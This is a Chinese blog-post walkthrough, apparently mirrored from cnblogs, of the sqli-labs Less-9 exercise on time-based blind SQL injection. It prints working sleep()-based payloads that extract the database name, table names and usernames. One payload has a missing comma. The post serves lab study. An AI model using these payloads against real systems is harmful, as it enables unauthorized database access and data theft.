zoukankan      html  css  js  c++  java
  • sqli(9)

    less9--基于时间的GET单引号盲注

    前言

    重写博客是为了赶作业,现在已经下定决心考研了。以后这个博客只会记录我的数学、英语、数据结构学习记录了。我还是

    想使劲冲一把,但是最近羁绊太多。很多作业(除了渗透),我都觉得很鸡肋。算了,放宽心。comfortable。

    0x01 基本知识学习

    无论输入什么都是原界面:

    • 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。
    • 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)。

    0x02 实验开始

    1.通过时间盲注得出本条语句是否正确,返回的时间和设定的时间差不多则语句是正确的。

    原界面:

     2.开始暴数据库名

    ?id=1' and if(ascii(substr(database(),1,1))>115,0,sleep(5))--+

    ASCII码大于115是正确的,说明取115=“s”

    3.暴表名

    ?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 0,sleep(5))

    4.爆字段和构造方法

    ?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>100, 0,sleep(5)) #

     记住,明年明年和你竞争的人有400万。。。

  • 相关阅读:
    在Mac电脑编译c51程序
    Unix程序员的Win10二三事
    macOS webview编程
    Day 6 文件属性与命令执行流程
    Day 5文件管理—三剑客的了解
    Day4 文件管理-常用命令
    Day3 目录结构及文件管理
    Day 2 Bash shell 认识
    Day 1 linux系统的发展史与虚拟机的安装过程
    【Offer】[66] 【构建乘积数组】
  • 原文地址:https://www.cnblogs.com/TEAM0N/p/12068300.html
Copyright © 2011-2022 走看看